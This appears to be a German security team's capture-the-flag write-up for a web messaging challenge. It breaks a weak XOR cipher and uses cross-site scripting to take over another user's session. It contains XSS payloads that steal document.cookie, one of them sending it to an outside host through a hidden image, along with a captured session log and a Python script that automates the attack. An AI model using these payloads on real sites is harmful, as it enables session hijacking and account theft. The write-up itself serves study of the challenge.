░█▀█░▀█▀░█▀▄░█▄█░█▀█░█▀▀░█░█░░░░█▀▄░█▀▀ ░█▀█░░█░░█▀▄░█░█░█▀█░█░░░█▀▄░░░░█░█░█▀▀ ░▀░▀░▀▀▀░▀░▀░▀░▀░▀░▀░▀▀▀░▀░▀░▀░░▀▀░░▀▀▀
Aus der Kategorie Hacking
Register at http://128.238.66.214/login.php Send yourself messages until you figure out how the algorithm for encrypting works.
In short, it is an XOR algorithm which works like this
enc[0] = IV ^ KEY ^ PLAINTEXT[0] # PLAINTEXT[0] and enc[0] is equal 8bytes enc[1] = KEY ^ enc[0] ^ PLAINTEXT[1] enc[2] = KEY ^ enc[1] ^ PLAINTEXT[2] ...
This works both ways for encrypting and decrypting. The IV can be found out relative easily we set PLAINTEXT[0] = KEY and we get the following IV ['0x17', '0x34', '0x17', '0x39', '0x11', '0x35', '0x24', '0x36'].## XSS
We can now proceed to get Dogs' SessionID. After injecting
<form id="f" method="POST" action="compose.php">
<input name="to" value="test12">
<input name="title" value="pw">
<input name="key" value="a">
<input name="text" id="t">
</form>
<script>
document.getElementById("t").value=document.cookie;document.getElementById("f").submit();
</script>
through the text field, we see... NOTHING. Apparently Dog has read its mail(message changes color when read), but doesn't reply back. The next try looks like this
<script>var url="http://$URL$?session="+document.cookie,theimg = document.createElement("img");theimg.src=url;document.body.appendChild(theimg);theimg.style.display="none";</script>
Meanwhile on the serverside:
>128.238.*.* - - [30/Sep/2012:04:08:56 +0200] "GET /?session=PHPSESSID=****************3208r7aj40 HTTP/1.1" 200 8937 "http://localhost/download.php?id=101649" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1
Change your session ID to dog, check messages id 1 to 6 (http://128.238.66.214/download.php?id=)
{
1: "\x1c\x30\x11\x2f\x5c\x67\x0a\x12\x32\x2e\x2b\x14\x79\x4b\x1a\x3a\x15\x1c\x0c\x2a\x53\x5d\x28\x1a\x34\x23\x2e\x1b\x44\x45\x28\x39\x3a\x22\x36\x7a\x33\x20\x5b\x56",
2: "\x17\x75\x56\x78\x50\x74\x65\x77",
3: "\x1d\x19\x2a\x01\x35\x04\x00\x05\x38\x33\x0d\x3d\x11\x2d\x49\x4e",
4: "\x17\x75\x56\x78\x50\x74\x65\x77",
5: "\x61\x47\x61\x4d\x6b\x49\x5a\x5b",
6: "\x17\x75\x56\x78\x50\x74\x65\x77",
}
and check the titles(5 Cat key is ILIKECARROTS). With this key we can read some of the messages and go further into the rabbit-hole. With the help if the obove key we decrypt all messages which results in one particular message: Catsareawesome.
After decrypting all the messages with this key and we get: Here, KEY{ITHISISAFLOwEERPOTTytPos} . Finished.
#!/usr/bin/env python
# by spq
import re
import urllib
import urllib2
def compose(_to, _title, _key, _text):
r = opener.open(
"http://128.238.66.214/compose.php",
urllib.urlencode({"to": _to, "title": _title, "key": _key, "text": _text}),
)
def get_last_msgid():
p = re.compile('download[.]php[?]id=([0-9]+)"')
last = None
for m in p.finditer(opener.open("http://128.238.66.214/outbox.php").read()):
last = m.group(1)
return last
def get_msg(i):
r = opener.open("http://128.238.66.214/download.php?id=" + i).read()
return r[619:-31]
def get_last_msg():
return get_msg(get_last_msgid())
opener = urllib2.build_opener()
opener.addheaders.append(("Cookie", "PHPSESSID=$SESSSION"))
def xor(a, b):
assert len(a) == len(b)
ret = ""
for i in xrange(0, len(a)):
ret += chr(ord(a[i]) ^ ord(b[i]))
return ret
def enc(key, text):
iv = "\x17\x34\x17\x39\x11\x35\x24\x36"
result = ""
while len(text) % 8:
text += chr("\x00")
extendedkey = key
while len(extendedkey) < len(text):
extendedkey += key
for i in xrange(0, len(text), 8):
part = text[i : i + 8]
result += xor(xor(extendedkey[i : i + 8], iv), part)
iv = part
return result
# compose("Dog", "foo", "aabb", enc("aabbaabb",'<form id="f" method="POST" action="compose.php"><input name="to" value="spq"><input name="title" value="pw"><input name="key" value="a"><input name="text" id="t"></form><script>document.getElementById("t").value=document.cookie;document.getElementById("f").submit();</script>'))
# print get_last_msg()
# T= {
# 1: "\x1c\x30\x11\x2f\x5c\x67\x0a\x12\x32\x2e\x2b\x14\x79\x4b\x1a\x3a\x15\x1c\x0c\x2a\x53\x5d\x28\x1a\x34\x23\x2e\x1b\x44\x45\x28\x39\x3a\x22\x36\x7a\x33\x20\x5b\x56",
# 2: "\x17\x75\x56\x78\x50\x74\x65\x77",
# 3: "\x1d\x19\x2a\x01\x35\x04\x00\x05\x38\x33\x0d\x3d\x11\x2d\x49\x4e",
# 4: "\x17\x75\x56\x78\x50\x74\x65\x77",
# 5: "\x61\x47\x61\x4d\x6b\x49\x5a\x5b",
# 6: "\x17\x75\x56\x78\x50\x74\x65\x77",
# }
# for i in range(1,6):
# print enc("ILIKECARROTS", T[i])
# print enc("Catsareawesome", T[i])
Fix for zfs-dkms-git in arch for kernel 5.15.7 erstellt am 11. December 2021
Project gemini erstellt am 13. Februar 2021
Eat Sleep PWN Repeat erstellt am 07. Dezember 2020
Breaking out of cisco anyconnect no local network restriction erstellt am 8. April 2018
Insomni Hack 2015(Lost In Memories) writeup erstellt am 23. Maerz 2014
ruCTF 2014(Pidometer) writeup erstellt am 21. Dezember 2014